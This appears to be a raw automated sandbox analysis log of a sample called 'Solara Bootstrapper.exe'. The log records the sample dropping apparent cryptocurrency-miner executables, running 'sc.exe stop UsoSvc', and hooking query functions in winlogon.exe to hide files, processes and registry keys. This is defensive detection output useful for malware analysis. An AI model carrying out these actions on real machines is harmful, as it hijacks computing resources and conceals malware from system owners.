Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Solara Bootstrapper.exe

Static file information: File size 10967040 > 1048576

Source: Solara Bootstrapper.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa74800

Source:	Binary string: T].PdBB?0_$u3J~7 source: Solara Bootstrapper.exe, 00000000.00000002.2100460502.0000000003887000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp

Source: SolaraBootstrapper.exe.0.dr

Static PE information: 0x9EA529E4 [Tue May 5 20:04:52 2054 UTC]

Source: xmr new.exe.4.dr	Static PE information: section name: .00cfg
Source: Kawpow new.exe.4.dr	Static PE information: section name: .00cfg
Source: eejhedztifcv.exe.9.dr	Static PE information: section name: .00cfg

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0443633D pushad ; ret	1_2_04436351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04430CC0 push eax; ret	1_2_04430CCA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04430CD0 push eax; ret	1_2_04430CDA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04430CE0 push eax; ret	1_2_04430CEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04430C80 push eax; ret	1_2_04430CBA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_06FE3E04 push ecx; retn 8564h	1_2_06FE3E13
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_081577B8 push eax; iretd	1_2_081577B9
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A497EACDD push rcx; retf 003Fh	2_2_0000019A497EACDE
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A4981C6DD push rcx; retf 003Fh	2_2_0000019A4981C6DE
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 5_2_00EB06E0 push eax; ret	5_2_00EB06EA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 5_2_00EB06F0 push eax; ret	5_2_00EB06FA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 5_2_00EB06D0 push eax; ret	5_2_00EB06DA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 5_2_00EB06B0 push eax; ret	5_2_00EB06CA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 5_2_00EB0669 push eax; ret	5_2_00EB066A
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 5_2_00EB0677 push eax; ret	5_2_00EB067A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04F9636B pushad ; ret	7_2_04F96371
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04F90FB8 push eax; ret	7_2_04F90FC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04F90FA8 push eax; ret	7_2_04F90FB2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04F90F98 push eax; ret	7_2_04F90FA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04F90F6A push eax; ret	7_2_04F90F92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04F90F28 push eax; ret	7_2_04F90F42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04F96F1C pushad ; ret	7_2_04F96F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_07E515B4 push FFFFFF8Bh; iretd	7_2_07E515B6
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C52ACDD push rcx; retf 003Fh	15_2_000001F43C52ACDE
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C55C6DD push rcx; retf 003Fh	15_2_000001F43C55C6DE
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E85899ACDD push rcx; retf 003Fh	53_2_000001E85899ACDE
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589CC6DD push rcx; retf 003Fh	53_2_000001E8589CC6DE
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140ADFDACDD push rcx; retf 003Fh	68_2_00000140ADFDACDE
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE87C6DD push rcx; retf 003Fh	68_2_00000140AE87C6DE

Source: C:\Users\user\AppData\Local\Temp\kx new.exe	File created: C:\Users\user\AppData\Local\Temp\xmr new.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	File created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	File created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	File created: C:\Users\user\AppData\Local\Temp\kx new.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	File created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe

File created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Hooks files or directories query functions (used to hide files and directories)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: winlogon.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
